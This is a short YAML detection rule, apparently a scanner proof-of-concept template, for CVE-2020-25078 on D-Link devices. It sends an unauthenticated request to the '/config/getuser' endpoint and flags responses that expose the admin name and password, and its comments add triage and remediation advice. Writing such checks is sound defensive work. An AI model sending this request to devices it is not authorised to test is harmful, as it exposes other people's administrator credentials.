---
# Detection rule for CVE-2020-25078 (D-Link): checks whether the device's
# /config/getuser endpoint returns account data in its response body.
name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
  # One probe only. The request as written carries no credentials, so a match
  # means the account data was served without any login in this request.
  - method: GET
    path: '/config/getuser?index=0'
    # Judge the direct response; a redirect target (e.g. a login page) is
    # never fetched and therefore cannot satisfy the expression.
    follow_redirects: false
    # All four conditions must hold: HTTP 200, a text/plain Content-Type, and
    # a body containing both `name=admin` and a `pass=` field.
    # NOTE(review): `name=admin` is a literal match, so a device whose index-0
    # account has a different name will not match - a miss is not proof that
    # the endpoint is closed.
    # NOTE(review): `pass=` also matches when nothing follows it; confirm the
    # field is populated before reporting a credential leak.
    # Triage on a hit: treat the account password as exposed - update the
    # firmware, rotate the credential, and keep the management interface off
    # untrusted networks.
    expression: |
      response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
detail:
  author: kzaopa(https://github.com/kzaopa)
  links:
    - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg